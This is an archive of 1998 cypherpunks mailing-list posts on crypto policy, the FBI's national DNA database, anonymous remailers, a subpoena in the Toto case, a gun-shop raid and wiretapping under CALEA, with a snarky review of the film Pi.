My wife and I went and saw the movie _PI_ this past weekend.  I was
attracted to it 'cause of the subject matter.  One reviewer wrote that
the protagonist was a "tortured genius steeped in an intriguing blend
of advanced mathematics and mystical Jewish cabala."

I suspect a fair number of cypherpunks' curiosity would be piqued by
such a description.  Well, don't waste the 5 bucks.  It's
self-indulgent, pretentious, second-year-film-student crap.  It's
whiny, "woe-is-me-tortured-genius" drivel.  It's
"squinty-cinematography-for-the-sake-of-squinty-cinematography"
effluvium.  

Here's the plot, in a nutshell:

1. Ah, I understand advanced mathematics SO WELL; I see patterns
EVERYwhere!  But alas, I cannot enjoy life's pleasures because I am,
de rigueur, a TORTURED GENIUS!

2. And my mentor USED to be a TORTURED GENIUS, but he stopped studying
THE PROFOUND MYSTERIES, and now he's happy and FUN!  What a WUSS!

[Oh yeah, and I suffer REALLY bad migraines.]

3. Isn't PI cool?

4. Aren't Fibonacci numbers neat?

5. Whaddya suppose The Holy Unspeakable Name of God is?

6. Oh, easy, it's 9049348384737...[insert 198 digits here]...32343.

7. I RUSH to tell my mentor what I've discovered, but, alas, my
ruthless taunting prompted him to re-open his investigation of THE
PROFOUND MYSTERIES and he couldn't hack it -- his brain overloaded and
he died of a stroke.  Damn!

8. So I dramatically BURN all my PROFOUND MYSTERIES conclusions and
the director inserts the requisite "shocking scene everyone will be
talking about" by having me lobotomize myself with an electric drill.

9. Next, I'm sitting on a park bench, playing games with a child
(Quintessential Innocence).  I am finally ENJOYING LIFE, appreciating
the leaves on the trees and such.  But this kid, she wants to play
math games with me, which of course symbolizes the fact that IT'S NOT
OVER!

10. The end.

And it's all shot on shitty stock in crackly black and white.  So
basically, it's about two gay cowboys and some pudding.


\\/alter




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ernest Hua" <hua@teralogic-inc.com>
Date: Wed, 14 Oct 1998 01:36:42 +0800
To: "Brown, R Ken" <brownrk1@texaco.com>
Subject: Re: FBI to inaugurate national DNA database
Message-ID: <004b01bdf6cb$23ad5d00$4164a8c0@mve21>
MIME-Version: 1.0
Content-Type: text/plain



I'm not talking about whether the FBI/NSA is setting us up
politically; they may very well be doing just that.  The point
is that we need to win wars by winning battles, but it's hard
to win battles by sticking to absolute principles and eventually
third parties looking no longer find you credible.  If we can
stick to pointing out just how similar GAK/KR is to cameras in
every bedroom, then we can win the battles and the war.  If
we just stick to either we get 100% of what we want or we
don't want it, then the FBI/NSA can manipulate the public into
thinking that we would never agree to anything the FBI/NSA
wants.

Remember ... we don't have what we want yet ... despite
some of the rhetoric on this list, and the FBI/NSA is trying to
win a war of attrition.

Ern

-----Original Message-----
From: Brown, R Ken <brownrk1@texaco.com>
To: cypherpunks@cyberpass.net <cypherpunks@cyberpass.net>; 'Ernest Hua'
<hua@teralogic-inc.com>
Date: Tuesday, October 13, 1998 2:56 AM
Subject: RE: FBI to inaugurate national DNA database


>> I think it would be a very bad idea for civil liberties
>> groups to come out 100% against this.  So far all they
>> have said is that they intend to log all convicted criminals.
>> If the C.L. groups complain about that, then it would be too
>> easy for the FBI to turn around and say, "Geez! These guys
>> complain about anything and everything we do!"
>
>I think you are falling for the old bazaar bargaining trick.  The guy
>wants to sell you a carpet that is worth a shekel. He reckons he can do
>you for ten shekels. So he starts the bidding at a hundred  and you
>think you've done well when you've beaten him down to fifteen.  America
>is - cypherpunks tell me - a country where people worry about their
>social security number being kept on databases,  where caller id on
>phones  can be a hot political issue.  This DNA business is far more
>intrusive and dangerous than any of that. Don't fall for it!
>
>Don't fall for the argument that it is only the bad guys who get tagged.
>They can define anyone they want as a bad guy. How many people do you
>know who have never done anything for which they could be convicted as a
>criminal? Never driven a car faster then the speed limit, never smoked
>dope, never ridden a bicycle on the pavement, never been drunk in a
>public place? To a large extent the set of  "convicted criminals" is
>governed by police or court decisions rather than by the actions of the
>criminals.
>
>Over here in Britain we've had a long succession of intrusive, abusive
>laws promulgated in the name of public safety, law and order, peace on
>the streets.  The previous government had their absurd "dangerous dogs
>act" which became a laughing stock before the ink was dry then their
>horrendous and evil  "Criminal Justice Bill"  with racist provisions
>allowing the police to persecute travellers and uttely useless laws
>against "music with repetitive beats" not to mention new rules to
>control "young offenders, bailed  persons, squatters, travellers,
>ravers,  protesters, trespassers, arrested persons,  defendants,
>hunt-saboteurs, pornographers, video pirates, obscene telephone-callers,
>prisoners, racists, terrorists, ticket touts, cannabis-smokers, serious
>fraudsters and not  forgetting gay men under 18."
>
>The current lot aren't as bad, and are certainly more well-intentioned
>but they haven't repealed any of the earlier stuff and are, bit by bit,
>filling in the few gaps in the wall of regulation and legislation the
>Tories built around anyone who wasn't a middle-aged white  man who
>worked 9 to 5, living in a suburb with a car and a mortgage,  who  never
>went out.
>
>Our current Home Secretary (cabinet minister with responsibility for
>police anong other things)  was probably the first person in such a
>position in any major country who was brought up by a single mother on a
>violent estate (what you'd call a housing project in America) and he
>thinks he knows - no he *does* know - what most ordinary people in
>environments like that want from life. So he proposes law after law to
>make things better, to tell people how they ought to live, all with the
>best of intentions. Curfews for children (you ask questions and he will
>just come back at you and say "do you *really* think 9-year-old children
>should be wandering around on their own at night, or in gangs?" to which
>the honest answer is "no, but it's none of your business if they do").
>Compulsory parenting education  for parents whose children commit
>crimes. A national register of paedophiles - which is made public,  so a
>couple of convicted child abusers, on being released from jail asked to
>be taken back in again because their life wasn't safe outside.  Defining
>email that goes outside the country as "export" so that writing about
>bombs (or cryptography?) can come under the strategic arms export
>regulations. And so on.
>
>And all the while local councils put up cameras in every high street...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 13 Oct 1998 22:45:34 +0800
To: cypherpunks@toad.com
Subject: Crypto Laxatives
Message-ID: <199810131412.KAB25441@camel14.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



Senators Lott and Kerrey have made crypto core dumps
in recent days:

   http://jya.com/lott100998.txt

   http://jya.com/kerrey101298.txt

Lott says 56-bit crypto is bad, and recites its weaknesses,
reading a script he doesn't know shit about, hair and mind
immutably fixatived.

Kerrey Lincoln Monuments long dead Nat sec with Info Tech 
faux marbre, frutilessly limoing around DC torrist piles looking 
for The American People, while Super-Coifed Cohen aimlessly 
sends Cold War B52s to PR-bomb Menwith Hill targets -- unruly 
wildhair ups -- protecting what Kerrey can't find.

Clinton and Yeltsin will shortly morph into Serbian hair ball.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Burnes <jvb@ssds.com>
Date: Wed, 14 Oct 1998 00:49:41 +0800
To: "Brown, R Ken" <brownrk1@texaco.com>
Subject: Re: Soccer Moms?
In-Reply-To: <896C7C3540C3D111AB9F00805FA78CE2013F84C8@MSX11002>
Message-ID: <Pine.LNX.3.96.981013100212.480A-100000@jb3.fastrans.net>
MIME-Version: 1.0
Content-Type: text/plain



On Tue, 13 Oct 1998, Brown, R Ken wrote:

> In the middle of an interesting article about digital cash, forwarded
> here by Bob Hettinga, there was the line:
> 
> > After all, the kind of soccer moms who elected Bill Clinton
> 
> "Divided by a common language" as I am  I genuinly don't know what that
> means. And I can't even guess from context. I'd have expected a dig at
> liberals or feminists or welfare recipients at that point; and I can't
> work out what soccer has to do with it.
> 
> Do mothers play soccer much in the USA?
> 

etc...

The answer you search for is:

In US primary schools (mostly in affluent suburbs), soccer (football)
is a very popular fall/winter sport for ages 7-14.

Soccer moms are the mothers that haul their sons and daughters around
after school and on Saturday mornings in minivans to these games.

"Soccer moms" connotes a particular kind of woman.  Its difficult to
give you an exact definition although its usually slightly deragatory.
Lets try to describe her:

Middle to Upper Middle class
White
Mid-thirties
Average Intelligence
Thinks Bill Clinton is a Stud
Probably a Career Mom and thinks working 9-5 in a big corporate
arcology is a pretty neat thing
(not relative to unemployment, but relative to others who think its a
trap)
Probably religious, either WASP, Catholic or Statist.

This, at least, is the stereotype.  YMMV.

Jim








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Bryan <sbryan@vendorsystems.com>
Date: Wed, 14 Oct 1998 01:27:44 +0800
To: Robert Hettinga <rah@shipwright.com>
Subject: Re: FYI: More on WebTV security
In-Reply-To: <v04011722b24904a8f519@[139.167.130.246]>
Message-ID: <v03102802b24934307011@[204.1.1.65]>
MIME-Version: 1.0
Content-Type: text/plain



Has anyone hacked WebTV to enable a terminal to connect to a plain vanilla
ISP (or better yet a local ethernet) or is it inexorably tied to their
network of proxy servers? I get the impression that like a Newton or any
other graphically limited device a WebTV browser would have to be aided by
a proxy server that translates the content to more amenable form before it
can take a crack at it. If it were possible to divorce it from their
service it might be a nifty device for less than $100. This would become
especially appealing if 128 bit crypto were thrown into the bargain.

Steve Bryan
Vendorsystems International
email: sbryan@vendorsystems.com
icq: 5263678
pgp fingerprint: D758 183C 8B79 B28E 6D4C  2653 E476 82E6 DA7C 9AC5





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <remailer@hr13.zedz.net>
Date: Tue, 13 Oct 1998 18:43:51 +0800
To: cypherpunks@einstein.ssz.com
Subject: BATF strike again
Message-ID: <eb5cbac67faa0bad@hr13.zedz.net>
MIME-Version: 1.0
Content-Type: text/plain



CHRISTINE L. PETERSON 

Friends skeptical of official account October 8, 1998
http://www.bakersfield.com/top/i--1304241419.asp

       
By CHRISTINE L. PETERSON
Californian staff writer 

Disbelief permeated the tight-knit communities of Taft and Ford City Thursday as residents and friends of Darryl Howell questioned law
enforcement's account of his death in his gun shop. 

The Kern County Sheriff Department's version of the events - that the gun shop owner grabbed a loaded .45-caliber handgun Wednesday,
struggled with officers and then placed the barrel in his mouth and pulled the trigger -just didn't fit with what they knew of the father of two. 

Sheriff's officials said a Taft police officer, not knowing where the expended round went, immediately fired three rounds that struck Howell, 45,
on the right side of his body. He died at the scene. 

"Everyone in Taft knows this is stupid," said Shannon Ong, 34, Howell's niece. "They think the police officers are trying to make it seem like he
was a criminal." 

Ong believes there could be nothing further from the truth - that the man who grew up in Taft and graduated from Taft Union High School
where yearbooks say he played football and was in the band was a wonderful man who ran an upstanding business. 

While at least one family member and friends said Howell was vocal in support of gun rights, they did not believe he would condone any illegal
behavior or sell illegal firearms. 

"The way that press release makes him sound, well, he just would have never done anything like that," Ong said after reading a copy of a
sheriff's news release on the incident. 

ATF agents went to Alpha Omega Surplus and Supplies Store as part of a four-year firearms trafficking investigation, said ATF special agent
Tracy Hite. 

She said ATF was assisted in serving a warrant by the Taft Police Department and Kern County Sheriff's Department. 

"This was a lengthy investigation that led us to several locations," Hite said, explaining that there were search warrants for five locations and
arrest warrants for three people in Kern County. 

Ong estimated her uncle had the business for 15 to 20 years, first within Taft city limits and then in the county. 

At the business Thursday, some family members and friends gathered at the shop. A bumper sticker on a window bore the message: "Only
tyrants and criminals fear honest armed citizens." Recorded programs blared from speakers outside the shop. 

"I just don't understand it," said friend Jamie Walchock. 

She said that while she didn't share Howell's support of guns, she respected him because he looked on the bright side of life, listened to and
worked with people on their problems and was satisfied with making ends meet. She said Howell talked about moving. 

"In the 12 years I have known him, I have never seen him upset," Walchock said. 

To her, Howell was a law-abiding citizen; she said he didn't like helmets so he stopped riding his motorcycle when the helmet law went into
effect. 

"I know in a million years he wouldn't ever shoot himself or lunge at a police officer," Walchock said. 

Ken Bishop, who would sometimes visit Howell at his shop, said Howell was "somewhat of a patriot" and would share his opinions about guns.
He said that law enforcement's statement that Howell had illegal firearms seems "off the wall." 

Mike Hodges, the publisher of Golden Empire Review, said Howell asked to have a column printed in the paper titled, "Notes from Moron." 

Taft was called Moron in 1908, according to "Kern County Place Names." The city changed its name to Taft in 1909. 

In the column, Howell quotes several passages from the Bible. The column Hodges attributed to Howell states, "It is not an hone to be in the
Militia! It is our God-given duty! We are commanded to be his soldiers. It is time to lay aside our 'daily' jobs and return to duty! R&R is over!
To arms, to arms! Where are His soldiers? 

"Right now, where is your squad members? Right now can you honestly state that you are aware of their location and their ability to respond to
duty?" 

Hodges said after Howell died, he reread the column. 

"It gave me an eerie, shaky feeling," Hodges said. 

He said he didn't believe Howell would ever resist arrest. While Howell didn't agree with some gun legislation, he abided by it, Hodges said. 

"I know Darryl wouldn't kill himself and he wouldn't hurt someone else," Hodges said. 

"My personal experience is he was a real giving person." 

10/07/98 Article
Man shot to death at Taft gun shop 
http://www.bakersfield.com/top/i--1304325052.asp




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Pallas Anonymous Remailer <athena@cyberpass.net>
Date: Wed, 14 Oct 1998 04:29:03 +0800
To: mail2news@basement.replay.com
Subject: The Value of Anonymous Remailers vs. Abuse Complaints and Abusive Comp
Message-ID: <</var/adm/utmpx cannot be opened.  Please "unset watch".>
MIME-Version: 1.0
Content-Type: text/plain



fa161f121ec06c2dd5b366ff7460fb12@anonymous.poster>

>The most frequent request we have been receiving
>so far is, in fact, about the idendity of the
>originator of the anonymous messages.  Some 
>people are being polite, others are not.
>Basically, all the ones who write to abuse@*.*
>want to know the email address of the one who
>has offended/harassed/spammed/blackmailed them.

The idea to get across is that that information is not available.
The snail mail services in various countries allow anonymous mail,
after all, so why should e-mail be any different?  People can
deposit mail in public mailboxes with no return address on the
envelope.  People can call from payphones and not have the call
traceable back to them.  People should also be educated that a From:
address, even when attached, cannot be relied upon for accuracy.  At
least anonymous e-mail lets the recipient know, in advance, that the
sender wishes to conceal his/her true identity.

>That is, it is true that a very significant % of
>all messages which pass thru the mixmaster
>network is just trash.
>
>Comments, anyone?

Even "trash" is valuable as cover traffic to thwart traffic
analysis, especially in the Mixmaster world where packets are
intended to be virtually indistinguishable.  Once remailer-operators
get involved in value judgements as to which anonymous e-mail
transactions have redeeming social value, we have sown the seeds of
censorship.  We empower the Gary Burnores of the world to censor by
intimidation when content neutrality is not maintained.

For example, if a certain signal to noise ratio were to be used as a
criteria for the validity of the remailer net, then a self-destruct
device has just been built into it.  An attacker need only inject
enough noise to exceed the threshold and bring the network down.

Consider the episode last year with Gary Burnore and DataBasix vs.
Jeff Burchell and his Mailmasher and Huge Cajones machines.
Made-to-order abuse appeared right on cue to reinforce the claims
that Burnore and his girlfriend Belinda Bryan had made.  And now
we've learned the real truth behind the whole episode.  While Gary
Burnore was living with another girlfriend in Santa Clara, CA, he
was also molesting her teenaged daughter.  An anonymous
whistleblower attempted to warn the girl's mother as well as her
school officials by anonymous e-mail.  Burnore went ballistic and
falsely claimed "harassment".  But the whistleblower was ultimately
vindicated when Burnore pled guilty to the molestation charge, was
placed on probation, and was required to register as a sex offender.
Unable to silence the whistleblower, Burnore began a campaign of
harassment against the operators of the remailers that were being
used to expose him.  IOW, if you can't refute the message, shoot the
messenger.  And if you can't shoot the messenger, attempt to disable
his means of communication (the remailers net).

I recounted this case history, which can be researched in various
usenet archives by anyone interested, just to demonstrate that one
man's "harassment" can well be another man's investigative
journalism, even if the journalist or whistleblower is not in a
position to expose him/herself to retaliation by the wrongdoer,
which has been (coincidentally?) reported by virtually anyone who
has dared to challenge Gary Burnore publicly.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Wed, 14 Oct 1998 04:01:59 +0800
To: users@EINSTEIN.ssz.com (SSZ User Mail List)
Subject: What it's like to get a subpoena (re Toto)
Message-ID: <199810131927.OAA07077@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi,

Just thought I'd pass along the latest news in the Toto/Carl Johnson/aka
situation.

I was visited by two nicely mannerd IRS agents this morning. We talked for
about an hour or so about Cypherpunks, CJ, Austin, majordomo, etc. In the
process I was served with a subpoena from the Western District of Washington
to appear on Nov. 18, 1998 at 1:15pm in room 311 of the United States
Courthouse (5th & Madison, Seattle, 98104).

I explained how majordomo works, how to manipulate majordomo to get lists of
subscribers (I used the SSZ subscriber list as an example), and described the
time in July (I believe) when CJ/Toto/aka visited the local meeting. We also
discussed the potential for altering email traffic through a remailer.

I've made it clear I have no problems answering their questions but have no
desire to go to Seattle in Nov. or any other time. They are looking into
whether a deposition given here would be sufficient for their needs. Until
then I'm getting ready for a 2-3 day trip to Seattle in Nov.....

I'm currently trying to decide whether to scan and post the subpoena on the
SSZ webpage.

It's interesting that they requested archives of the list. I explained that
I didn't archive the Cypherpunks or any of my other lists and that other
than minimal configuration issues I don't even archive the OS that runs
einstein (as it takes about 2 hours to rebuild from scratch from CD).

Please don't call or send private email requesting further details. They
didn't ask me to keep any of our discussion confidential but until I better
understand what is going on I'm taking the conservative course (I had a big
fight with myself about whether to even post this).


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Motyka <mmotyka@lsil.com>
Date: Wed, 14 Oct 1998 06:21:14 +0800
To: cypherpunks@toad.com
Subject: RE: DNA
Message-ID: <3623C90E.51D1@lsil.com>
MIME-Version: 1.0
Content-Type: text/plain



> If we had a DNA sample of all world citizens, then the pesky problem
> of the whole "it was either O.J. that was the killer or there's a one
> in five billion chance it was someone else" would simply disappear.

I'm not a biochemist but I don't think that this is accurate right now.
I think modern DNA analysis yields data that bear more resemblance to a
spectrum than anything else. In this case there is always a good
possibility for error. Remember how large a project the Human Genome
thing is? That is an actual sequencing project.

*****
Rather than use this technology for law enforcement why not really try
to make a Tyrannosaurus? That would seem to be a higher use.
*****

When this new FBI project gets established just watch how wide a net
they cast when defining who will be compelled to submit a sample!

Then we'll have some crooked fuck selling info to the insurance
companies. Or it will be legislated by the other crooked fucks.

And pattern analysis will identify the guilty before they even think
about committing an offense. 

Hell, they'll probably be able to ID the bad ones from samples
coerced/stolen at birth and then all future opportunity and resource
allocation will be effectively decided by the government, inc.

Compromise? If this thing is not implemented with strict controls
defining the type of offenses included then it is as offensive a
totalitarian tool as anything else discussed on this list

Mike

Is there perhaps a good point to getting everybody in the country on
this DNA database? Could it be that a single sample of DNA can be used
to produce a large supply of that DNA which could then be used to
fabricate evidence? You might say that the existence of the fabrication
technology and the availability of seed material invalidates the
evidence.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 14 Oct 1998 06:24:07 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Tracking: F.B.I.'s new national DNA database
Message-ID: <199810132157.OAA09978@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: Tracking: F.B.I.'s new national DNA database
Date: Mon, 12 Oct 1998 02:05:53 -0500
To: believer@telepath.com

Source:  WorldNetDaily
http://www.WorldNetDaily.com/exclusiv/981012_fbis_new_national_d.html

F.B.I.'s new national DNA database 
Secret computer set to open for business 

The FBI is set open a new national DNA data base
tomorrow, The New York Times reports.

The data base, with a new generation of forensic DNA
techniques, is designed to catch repeat offenders, but
civil libertarians fear it will be expanded from people
convicted of crimes to include almost everyone, giving
the government inordinate investigative powers over
citizens. 

The national DNA data base, housed in a secret
location, actually consists of 50 data bases run by the
states but unified by common test procedures and
software designed by the FBI. As of tomorrow, the
Times reports, it will be possible to compare a DNA
sample from a suspect or crime scene in one state with
all others in the system. 

 (c) 1998 Western Journalism Center 
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 14 Oct 1998 06:24:57 +0800
To: cypherpunks@cyberpass.net
Subject: IP: ISPI Clips 5.32: FBI & Privacy Advocates Battling Over Wiretapping
Message-ID: <199810132157.OAA09989@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: "ama-gi ISPI" <offshore@email.msn.com>
Subject: IP: ISPI Clips 5.32: FBI & Privacy Advocates Battling Over Wiretapping
Date: Mon, 12 Oct 1998 00:10:29 -0700
To: <Undisclosed.Recipients@majordomo.pobox.com>

ISPI Clips 5.32: FBI & Privacy Advocates Battling Over Wiretapping
News & Info from the Institute for the Study of Privacy Issues (ISPI)
Monday October 12, 1998
ISPI4Privacy@ama-gi.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This From: ABCNews.com, October 8, 1998
http://www.abcnews.com

Privacy on the Line
http://www.abcnews.com/sections/tech/DailyNews/wiretap981006.html

Law enforcement and privacy advocates are battling over wiretapping
boundaries in the digital age.

By
Michael Martinez
ABCNEWS.com

The FBI wants to be able to tap your cell phone. And it wants your phone
company to pay for the privilege of allowing the FBI to tap your cell
phone.

    That, at least, is the contention of privacy advocates and of the
telephone industry, which is under federal mandate to open all new
telecommunications technologies to wiretap access. Under the Communications
Assistance to Law Enforcement Act, telecommunications companies are
required provide wiretap capabilities for all of their new systems. Passed
by Congress in 1994, CALEA mandated that telecommunications companies
comply with access requirements by Oct. 25 of this year. That deadline,
however, has been pushed back until June 2000 by the Federal Communications
Commission as it tries to sort out just what the FBI is entitled to, and
how much reimbursement telecom companies should get.

     Originally, CALEA set aside $500 million to pay for infrastructure
upgrades on systems installed prior to Jan. 1, 1995. The United States
Telephone Association and other industry groups want that cutoff point
extended until 2000 as well, so that current systems are covered.


Voice Mail for Dope Dealers?

The telecommunications industry has introduced a wide range of popular -
and profitable - services in recent years, everything from prepaid calling
cards to Internet telephony to three-way calling. Cellular phones have
become nearly ubiquitous, and newer models are almost entirely digital.
Many customers have turned to third party voice-mail systems for message
services. When most of these systems were designed and implemented, no
thought was given to allowing federal or local law enforcement agencies
access.

     The FBI says it's entitled to access these services under current
wiretap laws. Privacy advocates disagree.

     "The FBI has been trying to use CALEA to greatly expand its
surveillance capabilities in ways never anticipated by Congress when it
passed the law," contends Barry Steinhardt, executive director of the
Electronic Frontier Foundation.

     The telephone companies also disagree, at least in principle. More
important, if forced by the government to comply, they want the federal
government to pay for the technology necessary to make it happen.

     The FBI claims that a compromise proposal by the USTA, which
represents local telephone companies, was too narrow, and excluded many of
the technological advances that have made law enforcement's job more
difficult.

     "There have been situations in which we've obtained permission to
wiretap, and we've been frustrated by the technology," says Stephen
Colgate, assistant U.S. attorney general for administration. "And the
criminals know it. Things like voice mail and prepaid calling cards, these
are the things used by the dope dealer or the bomb maker."


The Communications Haystack

The USTA, however, says the FBI is overreaching by including services not
covered by the original law.

     "The rules the FBI put forth in CALEA don't follow the intent of
Congress," says Michelle Tober, communications manager for the USTA. "If
the FBI wants this capability, it has to be granted to them by the FCC or
under a new law by Congress."

     The Electronic Frontier Foundation, along with the American Civil
Liberties Union and the Electronic Privacy Information Center, have
petitioned the FCC to limit law enforcement's ability to gain access to new
telecommunications services.

     "The problem with a wiretap is that it's a general search," Steinhardt
says. "Only one in six conversations that are recorded are criminal in
nature. Increasing law enforcement's powers will mean more conversations
recorded that have no bearing on investigations. We're giving them the
power to find a needle in a haystack."

     The FBI defends its proposed rules, saying that they still fall under
the original law allowing wiretaps, and that privacy will still be
protected by the judiciary system.

     "We still have to go before the judge. We still have to justify the
invasion of privacy in the courts," Colgate says. "We're not lowering the
bar by any means. This industry has been investing significant amounts of
capital into the infrastructure, and we've been losing (wiretap) capability
steadily."

Copyright (c)1998 ABCNEWS and Starwave Corporation.


--------------------------------NOTICE:------------------------------
ISPI Clips are news & opinion articles on privacy issues from
all points of view; they are clipped from local, national and international
newspapers, journals and magazines, etc. Inclusion as an ISPI Clip
does not necessarily reflect an endorsement of the content or opinion
by ISPI. In compliance with Title 17 U.S.C. section 107, this material is
distributed free without profit or payment for non-profit research
and educational purposes only.
---------------------------------------------------------------------------

ISPI Clips is a FREE e-mail service from the "Institute for the Study
of Privacy Issues" (ISPI). To receive "ISPI Clips" on a regular bases
(up to 3 - 8 clips per day) send the following message  "Please
enter [Your Name] into the ISPI Clips list: [Your e-mail address]" to:
ISPIClips@ama-gi.com  .

The Institute for the Study of Privacy Issues (ISPI) is a small
contributor-funded organization based in Victoria, British Columbia
(Canada). ISPI operates on a not-for-profit basis, accepts no
government funding and takes a global perspective.

ISPI's mandate is to conduct & promote interdisciplinary research
into electronic, personal and  financial privacy with a view toward
helping ordinary people understand the degree of privacy they have
with respect to government, industry and each other and to likewise
inform them about techniques to enhance their privacy.

But, none of this can be accomplished without your kind and
generous financial support. If you value in the ISPI Clips service or if
you are concerned about the erosion of your privacy in general, won't
you please help us continue this important work by becoming an "ISPI
Clips Supporter" or by taking out an institute Membership?

We gratefully accept all contributions:

  Less than $60    ISPI Clips Supporter
          $60 - $99    Primary ISPI Membership (1 year)
      $100 - $300    Senior ISPI Membership (2 years)
More than $300    Executive Council Membership (life)

Your ISPI "membership" contribution entitles you to receive "The ISPI
Privacy Reporter" (our bi-monthly 12 page hard-copy newsletter in
multi-contributor format) for the duration of your membership.

For a contribution form with postal instructions please send the following
message "ISPI Contribution Form" to ISPI4Privacy@ama-gi.com .

We maintain a strict privacy policy. Any information you divulge to ISPI
is kept in strict confidence. It will not be sold, lent or given away to
any third party.











**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 14 Oct 1998 06:25:30 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Tracking: NYT on FBI's Nat'l DNA Database
Message-ID: <199810132157.OAA10000@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: Tracking: NYT on FBI's Nat'l DNA Database
Date: Mon, 12 Oct 1998 03:10:00 -0500
To: believer@telepath.com

Source:  New York Times
http://www.nytimes.com/yr/mo/day/news/national/dna-data-base.html

October 12, 1998

F.B.I. Set to Begin Using National DNA Database

By NICHOLAS WADE

In a computer at a secret location, the FBI will open a national
DNA database on Tuesday that advocates say could significantly
reduce rape and other crimes by helping to catch repeat offenders earlier.

The data base, with a new generation of forensic DNA techniques,
promises to be so efficient that some civil libertarians fear it will be
expanded from people convicted of crimes to include almost everyone,
giving the government inordinate investigative powers over citizens. 

The national DNA data base consists of 50 data bases run by the states
but unified by common test procedures and software designed by the
FBI. As of Tuesday, it will be possible to compare a DNA sample from
a suspect or crime scene in one state with all others in the system. 

The national data base has been nearly a decade in the making. The final
pieces fell into place in June when Rhode Island became the last state to
set up a DNA data base. 

But the system still faces many unresolved issues, which are likely to play
out according to the reaction from the public and the courts. One such
issue is what types of offenders should be included. Another is whether
the mass screening of suspects' DNA will prove constitutional. 

DNA, the chemical that embodies a person's genetic programming, can
be found almost everywhere. People shed a constant torrent of dead skin
cells. Criminals leave blood when breaking and entering; they shed hair
and skin cells in fights, deposit saliva on glasses and leave sweat stains in
head bands. From only a few cells in such sources, enough DNA can be
extracted to identify the owner. A DNA database of sufficient size could
presumably help solve many crimes. 

The crime-fighting potential of DNA data bases is becoming evident from
the experiences of Britain, which started earlier and has had fewer
administrative and constitutional hurdles to overcome. The data base
there initially focused on sex offenses but has spread to include burglaries
and car theft because of the high number of DNA matches that police
forces were obtaining. Moreover, there was considerable crossover at
least in Britain, among different kinds of offenses. 

"People who commit serious crime very often have convictions for petty
crime in their history, so if you could get them on the data base early you
may prevent serious crime," said David Werrett, manager of the DNA
data base for England and Wales. 

The English DNA data base includes entries from crime scenes and from
everyone convicted of a crime, as well as from suspects in unresolved
cases. Since the system's debut in 1995, it has matched 28,000 people
to crime scenes and has made 6,000 links between crime scenes. The
data base now holds 360,000 entries and Werrett said he expected it
would eventually include one third of all English men between 16 and 30,
the principal ages for committing crimes. 

Werrett said that the data base has grown because police forces in
England, which pay $55 for a DNA analysis, are finding it cost effective.
Recently the Police Superintendents Association called for the entire
population to be DNA tested. 

Forensic use of DNA in the United States is unlikely to go as fast or as
far as in Britain. 

"Their system makes a tremendous amount of sense the way they
approach it, but in the United States we have a different perspective on
privacy and on the extent to which we would be willing to depend on a
data base," said Christopher Asplen, executive director of the national
Commission on the Future of DNA Evidence. 

One major privacy safeguard in the FBI's system is that only a minute
fraction of a person's genetic endowment becomes part of the data base.
Under a new DNA profiling system known as STR's, for short tandem
repeats, a person's DNA is tested at 13 specific sites at which a short
length of DNA is repeated in a kind of stutter. The number of repeats is
highly variable from one person to another, so that measuring the number
of repeats at the 13 designated sites gives a way of identifying each
individual with a probability of one in several billion. 

The blood or other samples donated by individuals are retained by the
states in collections known as DNA banks. All that goes into the
computerized DNA data bases is the set of 13 numbers from the STR
measurements. Only identifying information, and nothing about a person's
health or appearance, can be divined from the STR's. 

Access to the DNA data base is permitted only for law enforcement
purposes, with a $100,000 fine for unauthorized disclosures. No known
breaches of the system have occurred. 

One major unresolved issue is that of the types of offenders from whom
DNA profiles should be taken. All states require people convicted of
serious sexual offenses to donate blood samples, but differ on requiring
samples from other groups such as people convicted of violent felonies,
juvenile offenders and parolees. 

Four states -- Virginia, Wyoming, New Mexico and Alabama -- require
all people convicted of a felony to provide samples for DNA profiling.
Louisiana allows DNA to be taken from people merely arrested in a
crime, a practice that has not been tested in the courts. 

State laws establishing DNA data bases have been challenged in 13
jurisdictions and have been upheld in all but one, in Massachusetts. Some
states have revised their original legislation to add offenses. 

